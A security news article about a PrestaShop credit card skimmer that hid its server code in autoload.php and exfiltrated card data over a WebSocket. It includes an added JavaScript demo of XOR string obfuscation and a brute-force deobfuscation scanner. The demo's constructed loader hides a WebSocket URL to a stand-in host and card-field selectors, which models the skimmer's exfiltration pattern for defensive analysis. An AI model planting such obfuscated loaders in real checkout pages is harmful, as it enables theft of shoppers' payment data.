Card Skimmer Exploits PrestaShop GTAG WebSocket to Steal User Banking Data

Published on August 15, 2024
Written by:
Lore Apostol
Cybersecurity & Streaming Writer

A threat actor was seen exploiting a PrestaShop GTAG WebSocket connection to exfiltrate an online store's customer credit card data, according to a recent analysis by Sucuri's security researchers. The card-stealer infection triggered an antivirus warning, which is typical in these cases.

In the case studied, the compromised website's source code had obfuscated JavaScript appended at the bottom of the page, but searching for the strings found in that script turned up nothing, so the injection could not be located directly.

Credit card skimming malware has to load on the checkout page, so it is typically injected into core CMS files, theme files, certain areas of the database, or, on WordPress, malicious WooCommerce plugins.

PrestaShop Skimming
Image Source: Sucuri

The attackers used a WebSocket as the exfiltration channel to blend the theft into ordinary traffic: a WebSocket keeps a persistent, full-duplex connection open between the browser and the server, so stolen data travels inside continuous two-way traffic rather than as a one-off HTTP request that stands out in logs. The server-side part of the skimmer was hidden in autoload.php under the PrestaShop config subdirectory, alongside config.inc.php.

The JavaScript injected into the checkout page and executed in the victim's browser avoids static detection by never storing its strings in plain text: each string is kept as an array of character codes, XORed with a simple key, and rebuilt at runtime with String.fromCharCode, so signature scans for the exfiltration URL or the targeted form fields find nothing.
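The following is an added example, not code from Sucuri's write-up or from PrestaShop. It reproduces the string-hiding technique just described (character codes XORed with a one-byte key and rebuilt with String.fromCharCode) and shows the analyst's side of it: pull numeric arrays out of page source, brute-force all 256 single-byte keys, and keep the decoding that looks like text. The sample page source, the key 0x5a, the hostname example.invalid and the two hidden strings are all constructed for the example.

```javascript
// Added example, not the skimmer's or Sucuri's code. Demonstrates the
// fromCharCode + XOR string hiding described above and how to reverse it
// from page source. All sample data below is constructed.

// Tokens that make a decoded string interesting to an incident responder.
const TOKENS = ["ws://", "wss://", "http", "card", "cvv", "number", "name=", ".php"];

// Attacker side of the technique: hide a string as XORed character codes.
function obfuscate(plain, key) {
  return Array.from(plain, ch => ch.charCodeAt(0) ^ key);
}

// Runtime side: what the injected script does before using the string.
function deobfuscate(codes, key) {
  return String.fromCharCode(...codes.map(c => c ^ key));
}

function isPrintableAscii(s) {
  return /^[\x20-\x7e]+$/.test(s);
}

// Score a candidate decoding: known exfil/card tokens count most, then the
// share of letters, digits and common punctuation.
function score(text) {
  const lower = text.toLowerCase();
  const hits = TOKENS.filter(t => lower.includes(t)).length;
  const wordy = (text.match(/[a-z0-9 .:\/=\[\],_-]/gi) || []).length / text.length;
  return hits * 10 + wordy;
}

// Try every single-byte key and return the best-looking plaintext, or null
// if no key yields printable ASCII.
function recoverKey(codes) {
  let best = null;
  for (let key = 0; key < 256; key++) {
    const text = deobfuscate(codes, key);
    if (!isPrintableAscii(text)) continue;
    const s = score(text);
    if (best === null || s > best.score) best = { key, text, score: s };
  }
  return best;
}

// Find comma-separated runs of at least 8 small integers in page source;
// these are the arrays an obfuscated fromCharCode loader feeds on.
function extractCodeArrays(source) {
  const re = /\b\d{1,3}(?:\s*,\s*\d{1,3}){7,}\b/g;
  return Array.from(source.matchAll(re), m =>
    m[0].split(",").map(n => parseInt(n.trim(), 10)));
}

// Scan page source and report arrays that decode to a suspicious string.
// Returns [] when nothing decodes to something containing a TOKEN.
function scanSource(source) {
  const findings = [];
  for (const codes of extractCodeArrays(source)) {
    const hit = recoverKey(codes);
    if (!hit) continue;
    const lower = hit.text.toLowerCase();
    const indicators = TOKENS.filter(t => lower.includes(t));
    if (indicators.length > 0) findings.push({ key: hit.key, text: hit.text, indicators });
  }
  return findings;
}

// Constructed sample: a legitimate-looking gtag snippet followed by the kind
// of loader the article describes. example.invalid is a reserved name and
// G-XXXXXXX is a placeholder measurement ID.
const KEY = 0x5a;
const EXFIL = "wss://example.invalid/socket";
const FIELDS = "input[name=card_number],input[name=cvv]";
const SAMPLE_SOURCE = `
<script async src="https://www.googletagmanager.com/gtag/js?id=G-XXXXXXX"></script>
<script>
var a=[${obfuscate(EXFIL, KEY).join(",")}];
var b=[${obfuscate(FIELDS, KEY).join(",")}];
var k=${KEY};
var w=new WebSocket(String.fromCharCode.apply(null,a.map(function(c){return c^k})));
</script>`;

console.log(scanSource(SAMPLE_SOURCE));
```

Run it with node and the scanner prints both hidden strings with the recovered key 90 (0x5a) and the tokens that flagged them; the plain gtag snippet produces no finding. The brute force works because a single-byte XOR has only 256 candidates and the real plaintext is the only one that is both printable and contains the tokens a skimmer needs (a WebSocket URL, card field selectors).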

Injected Skimmer Code PrestaShop
Image Source: Sucuri

The victim was running an outdated version of the platform: the store used PrestaShop 1.7.4.2, released in 2018. Dozens of CVEs have been published against PrestaShop since then, leaving the website exposed to any attacker who cared to look.

PrestaShop is among the ten most common eCommerce solutions for online stores, used by just over 1% of all websites, which amounts to more than 60,000 shops.

In June, a new variation of the "gtag" credit card skimming attacks, which security researchers named Caesar Cipher Skimmer, hit almost 80 sites in the first two weeks after its discovery. It was deployed to several CMS platforms, infecting WordPress, Magento, and OpenCart sites.
